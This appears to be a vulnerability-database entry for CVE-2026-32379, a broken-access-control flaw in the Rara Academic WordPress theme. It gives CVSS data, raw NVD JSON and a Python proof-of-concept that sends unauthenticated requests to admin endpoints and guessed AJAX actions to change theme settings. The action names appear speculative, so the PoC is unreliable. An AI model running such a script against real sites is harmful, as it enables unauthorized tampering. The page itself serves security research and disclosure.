Security Vulnerability Report
中文
CVE-2026-32379 CVSS 5.3 MEDIUM

CVE-2026-32379

Published: 2026-03-13 19:54:53
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Rara Academic rara-academic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rara Academic: from n/a through <= 1.2.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Rara Academic Theme <= 1.2.2
Rara Academic Theme n/a through 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32379 PoC - Missing Authorization in Rara Academic Theme # Target: WordPress site with Rara Academic theme <= 1.2.2 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-32379 This vulnerability allows unauthorized access to protected functions """ # Common AJAX endpoints in Rara Academic theme endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/settings", "/wp-admin/options.php" ] for endpoint in endpoints: url = f"{TARGET_URL}{endpoint}" # Send request without authentication try: response = requests.get(url, timeout=10) # Check if we can access protected resources if response.status_code == 200: # Look for indicators of unauthorized access if "option_page" in response.text or "rara_academic" in response.text: print(f"[+] Potential vulnerability found at: {url}") return True except requests.RequestException as e: print(f"[-] Error testing {url}: {e}") return False def exploit_unauthorized_access(): """ Attempt to exploit the missing authorization vulnerability to access or modify theme settings without authentication """ exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Common vulnerable actions in Rara Academic vulnerable_actions = [ "rara_academic_save_settings", "rara_academic_update_option", "rara_academic_modify_theme_mods" ] for action in vulnerable_actions: data = { "action": action, "nonce": "", # No nonce required due to missing authorization "settings": { "arbitrary_key": "arbitrary_value" } } try: response = requests.post(exploit_url, data=data, timeout=10) if response.status_code == 200: print(f"[!] Action '{action}' may be exploitable") except requests.RequestException: pass if __name__ == "__main__": print("CVE-2026-32379 - Rara Academic Missing Authorization") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32379", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:52.800", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Rara Academic rara-academic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rara Academic: from n/a through <= 1.2.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Rara Academic rara-academic permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Rara Academic: desde n/a hasta &lt;= 1.2.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/rara-academic/vulnerability/wordpress-rara-academic-theme-1-2-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}